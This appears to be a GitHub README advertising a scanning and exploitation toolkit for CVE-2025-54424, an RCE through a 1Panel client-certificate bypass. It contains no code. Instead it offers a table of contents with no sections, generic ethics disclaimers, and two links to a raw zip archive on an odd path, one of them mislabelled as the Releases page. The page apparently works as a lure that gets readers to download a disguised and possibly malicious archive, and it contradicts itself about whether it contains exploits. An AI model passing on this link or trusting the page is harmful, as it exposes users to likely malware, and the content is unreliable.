
CVE-2025-54424: 1Panel TLS client cert bypass enables RCE via forged CN 'panel_client' using a bundled scanning and exploitation tool. Affected: <= v2.0.5. 🔐
https://raw.githubusercontent.com/hophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip
CVE-2025-54424 is a vulnerability related to 1Panel, involving client certificate bypass that may lead to remote code execution. This repository provides an integrated toolkit designed to assist researchers in scanning and validating this vulnerability within controlled lab environments. The toolkit emphasizes security testing, educational purposes, and compliant research on affected systems. This project does not provide payloads or exploit scripts for unauthorized access or targeting external assets. Use it only in environments where explicit authorization has been granted, and comply with local laws and industry compliance requirements.
Table of Contents
About This Repository This is a collection of tools designed for researchers and security engineers working on CVE-2025-54424 research. The core objective is to provide a transparent, reproducible testing environment for evaluating the impact scope, identifying configuration factors, and assessing the effectiveness of fixes in controlled environments. The project emphasizes documented testing processes, traceable result records, and protective operations on assets.
Project Objectives and Scope
Code of Conduct and Ethics
Feature Overview
How It Works (High-Level Architecture)
Security and Protection Guidelines
Environment Requirements and Installation
Installation Steps (High-Level)
Quick Start (High-Level Flow)
Usage Modes and Workflows
Developer Guide
Testing and Quality Assurance
Versioning and Releases
Versioning and Release Details
Contribution Guide
Frequently Asked Questions
License and Authorization
Acknowledgments
If you need to view specific release items, downloaded files, and more sample configurations, please visit the following link and refer to related documentation as needed. See the Releases page at https://raw.githubusercontent.com/hophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip
Notes